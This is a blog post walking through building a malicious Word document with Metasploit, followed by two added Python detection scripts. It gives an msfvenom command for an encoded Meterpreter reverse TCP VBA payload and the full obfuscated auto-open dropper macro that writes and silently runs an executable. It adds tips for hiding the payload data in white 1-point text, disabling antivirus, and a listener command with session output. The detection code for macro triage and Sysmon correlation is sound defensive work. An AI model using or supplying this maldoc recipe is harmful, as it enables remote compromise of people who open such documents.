Hello All. I’m as sick as a dog currently, but that isn’t going to stop me from writing a Substack post for this week. Today’s post will discuss VBA and MS Office macros.
What
You may have heard of macros before. In MS Office, macros are used to automate repetitive tasks and to give you more control over an Office document. Let’s say, for example, you wanted to open up a message box whenever someone clicked on a certain cell in Excel. In order to do that, you would need to write a macro.
Office macros are written in Visual Basic for Applications, or VBA. VBA has access to most, if not all, of the .NET API, which means a macro can control a great deal of the Windows environment. If you’re good enough, you can fit something malicious into a macro to do who knows what.
How
Instead of having a crash course in Visual Basic, why not let some tools do the heavy lifting for us? Metasploit can create a malicious macro for us to open a Meterpreter session.
Do you know how to use Metasploit? If not, I’ve got you covered.
Metasploit’s built-in macro generator will most likely be caught by AV. But, with some finesse, you can write a macro that is actually useful and slip the malicious code in among the legitimate code.
Why
Because it’s fun.
Methodology
1. Create a malicious VBA macro that opens up a reverse TCP shell.
2. Insert that macro into a Word document.
3. Create a reverse TCP handler.
4. Open the Word document.
5. ???
6. Profit
Requirements
- Metasploit on either Windows or Linux, preferably on WSL.
- Microsoft Office.
- Shutting off your AV (unless you plan on writing your own VBA macro).
First, you’ll want to create the Word document you want to infect. You can use other Office document types; however, the example I will use only works with Word. I will use my resume.
We’re all cool kids here, so we can create the macro in a single line.
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe > vba.txt
This creates a unique Office macro that opens a Meterpreter reverse TCP shell, along with the supporting payload data, and writes it all to vba.txt.
When you open vba.txt, you are given two parts.
'**************************************************************
'*
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
'*
'**************************************************************
Let’s first focus on the macro itself.
' Entry point: Word runs this when the document opens.
Sub Auto_Open()
    Micos12
End Sub

' Rebuilds the executable from the hex text hidden in the document body.
Sub Micos12()
    Dim Micos7 As Integer
    Dim Micos1 As String
    Dim Micos2 As String
    Dim Micos3 As Integer
    Dim Micos4 As Paragraph
    Dim Micos8 As Integer
    Dim Micos9 As Boolean
    Dim Micos5 As Integer
    Dim Micos11 As String
    Dim Micos6 As Byte
    Dim Ncmkypmwgt as String
    ' Marker string: the hex data starts in the paragraph after the one containing it.
    Ncmkypmwgt = "Ncmkypmwgt"
    Micos1 = "OcHdHkMasQMMpO.exe"
    Micos2 = Environ("USERPROFILE")
    ChDrive (Micos2)
    ChDir (Micos2)
    Micos3 = FreeFile()
    Open Micos1 For Binary As Micos3
    For Each Micos4 in ActiveDocument.Paragraphs
        DoEvents
        Micos11 = Micos4.Range.Text
        If (Micos9 = True) Then
            ' Each 4-character "&Hxx" token becomes one byte of the file.
            Micos8 = 1
            While (Micos8 < Len(Micos11))
                Micos6 = Mid(Micos11,Micos8,4)
                Put #Micos3, , Micos6
                Micos8 = Micos8 + 4
            Wend
        ElseIf (InStr(1,Micos11,Ncmkypmwgt) > 0 And Len(Micos11) > 0) Then
            Micos9 = True
        End If
    Next
    Close #Micos3
    Micos13(Micos1)
End Sub

' Launches the written file from the user profile directory with no visible window.
Sub Micos13(Micos10 As String)
    Dim Micos7 As Integer
    Dim Micos2 As String
    Micos2 = Environ("USERPROFILE")
    ChDrive (Micos2)
    ChDir (Micos2)
    Micos7 = Shell(Micos10, vbHide)
End Sub

' Alternative auto-run names so the same entry point fires across Office versions and applications.
Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
The macro is an obfuscated piece of code that opens the reverse shell. Whenever the file is opened, Workbook_Open is called (earlier versions of Word call AutoOpen/Auto_Open, so those exist for backwards compatibility).
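From the defender’s side, those auto-run names and the calls the macro makes are exactly what static macro triage keys on. The following Python script is an added example, not code from this post or from Metasploit: it scans VBA source text for auto-exec subs and for the combination of behaviours the macro above exhibits (reading document paragraphs, writing bytes with Open … For Binary and Put #, then launching the result with Shell and vbHide). The SAMPLE_DROPPER text is a constructed, condensed stand-in for the macro shown above; the benign sample, the rule names and the verdict labels are my own.

```python
import re

# Subs that Office runs automatically when a document opens (the names the post mentions,
# plus Document_Open and AutoExec, which Word also honours).
AUTO_EXEC_SUBS = ("Auto_Open", "AutoOpen", "AutoExec", "Document_Open", "Workbook_Open")

# Behaviours that, next to an auto-exec entry point, point to a dropper rather than automation.
SUSPICIOUS_PATTERNS = {
    "shell_exec": re.compile(r"\bShell\s*\(", re.IGNORECASE),          # launches a process
    "hidden_window": re.compile(r"\bvbHide\b", re.IGNORECASE),         # ... with no window
    "env_lookup": re.compile(r"\bEnviron\s*\(", re.IGNORECASE),        # finds a writable dir
    "binary_file_write": re.compile(r"\bOpen\b.+\bFor\s+Binary\b", re.IGNORECASE),
    "put_bytes": re.compile(r"\bPut\s+#", re.IGNORECASE),              # writes raw bytes
    "exe_literal": re.compile(r'"[^"]*\.exe"', re.IGNORECASE),         # hard-coded .exe name
    "reads_document_text": re.compile(r"\bActiveDocument\.Paragraphs\b", re.IGNORECASE),
}

SUB_DEF = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)", re.IGNORECASE | re.MULTILINE)

# Constructed sample: a condensed stand-in for the dropper shown above (hypothetical names).
SAMPLE_DROPPER = """Sub Auto_Open()
    Dropper
End Sub
Sub Dropper()
    Dim f As Integer
    Dim p As Paragraph
    Dim b As Byte
    Dim r As Integer
    ChDir (Environ("USERPROFILE"))
    f = FreeFile()
    Open "payload.exe" For Binary As f
    For Each p In ActiveDocument.Paragraphs
        b = Mid(p.Range.Text, 1, 4)
        Put #f, , b
    Next
    Close #f
    r = Shell("payload.exe", vbHide)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
"""

# Constructed sample: a harmless auto-exec macro.
SAMPLE_BENIGN = """Sub Document_Open()
    MsgBox "Welcome to the quarterly report"
End Sub
"""


def triage_vba(source: str) -> dict:
    """Return the auto-exec entry points, the matched behaviours and a verdict for one module."""
    defined = {m.group(1).lower() for m in SUB_DEF.finditer(source)}
    auto_exec = [name for name in AUTO_EXEC_SUBS if name.lower() in defined]
    hits = sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(source))
    if auto_exec and {"shell_exec", "binary_file_write"} <= set(hits):
        verdict = "dropper"      # runs on open, writes a file, executes it
    elif hits:
        verdict = "suspicious"   # risky calls without the full chain
    elif auto_exec:
        verdict = "review"       # auto-exec alone: read what it does
    else:
        verdict = "clean"
    return {"auto_exec": auto_exec, "hits": hits, "verdict": verdict}


if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        print(label, triage_vba(src))
```

Renaming the variables, as msfvenom does, changes nothing here: the triage keys on keywords and entry-point names, not on identifiers, which is why the obfuscation in the generated macro does not hide it from tools like this.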
To add a new macro, copy the macro code (excluding the hex data below it), click View, then click Macros. This opens a box where you enter a name for your new macro; call it whatever you want. Once you click Create, a new editor page opens. Paste the code into the script box there, overwriting everything.
For part 2, there is a section of hex data. For something as large and powerful as a Meterpreter shell, the script needs a lot of data in order to execute. Unfortunately, it has to be added at the end of the document, but there is a trick you can use to hide it better:
1. Paste the data at the end of the document.
2. Set the font size to 1.
3. Set the text color to white.
After pasting the entirety of the data at the end of the document, the document is malicious, and opening it will execute the exploit.
All that is left is to create a reverse TCP listener.
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 4444; run;"
Now you can open the infected document and a Meterpreter session will open!
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 127.0.0.1
LPORT => 4444
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Sending stage (175174 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57252 ) at 2022-11-16 12:19:24 -0600
meterpreter >
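On the endpoint, the chain above has a distinctive shape: WINWORD.EXE writes an .exe into the user profile, that .exe starts with Word as its parent, and it then connects out to the handler. The Python below is an added detection example, not part of this post: it walks constructed Sysmon-style events (EventID 1 = process create, 3 = network connect, 11 = file create; field names follow Sysmon’s schema, values are made up apart from the dropper file name the macro above writes) and correlates the Office file-write with the later execution and connection of the same path.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Where a macro that does ChDir(Environ("USERPROFILE")) ends up writing its file.
USER_PROFILE_PATH = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)

# Constructed Sysmon-style events in time order. Paths and times are made up; the dropper
# file name is the one the post's macro writes.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2022-11-16 18:19:01",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 11, "UtcTime": "2022-11-16 18:19:20",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetFilename": r"C:\Users\alice\OcHdHkMasQMMpO.exe"},
    {"EventID": 1, "UtcTime": "2022-11-16 18:19:21",
     "Image": r"C:\Users\alice\OcHdHkMasQMMpO.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 3, "UtcTime": "2022-11-16 18:19:22",
     "Image": r"C:\Users\alice\OcHdHkMasQMMpO.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 4444},
    {"EventID": 1, "UtcTime": "2022-11-16 18:25:00",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _base(path: str) -> str:
    """Lower-cased file name part of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_macro_dropper(events):
    """Walk events in order and return (rule, UtcTime, detail) tuples for each match."""
    alerts = []
    dropped = set()  # executables an Office process has written, keyed by lower-cased path
    for ev in events:
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        if eid == 11 and _base(image) in OFFICE_APPS:
            # Office applications do not normally create executables.
            target = ev.get("TargetFilename", "")
            if target.lower().endswith((".exe", ".dll", ".scr")):
                dropped.add(target.lower())
                alerts.append(("office_wrote_executable", ev["UtcTime"], target))
        elif eid == 1:
            parent = ev.get("ParentImage", "")
            # Word launching a binary from the user profile is the Shell() call above.
            if _base(parent) in OFFICE_APPS and USER_PROFILE_PATH.match(image):
                alerts.append(("office_spawned_user_profile_exe", ev["UtcTime"], image))
            # Stronger still when the launched file is one Office wrote moments earlier.
            if image.lower() in dropped:
                alerts.append(("dropped_file_executed", ev["UtcTime"], image))
        elif eid == 3 and image.lower() in dropped:
            dest = f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')}"
            alerts.append(("dropped_file_network_connect", ev["UtcTime"], dest))
    return alerts


if __name__ == "__main__":
    for rule, when, detail in detect_macro_dropper(SAMPLE_EVENTS):
        print(when, rule, detail)
```

The correlation on the dropped path is what separates this from a noisy "Office spawned a child" rule: the first Word event in the sample (Word started by Explorer) and the Notepad launch produce nothing, while the four events of the dropper chain each produce an alert.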
That concludes this week’s post. Have a great weekend. Don’t forget to turn your AV back on!
Go!
-BowTiedCrawfish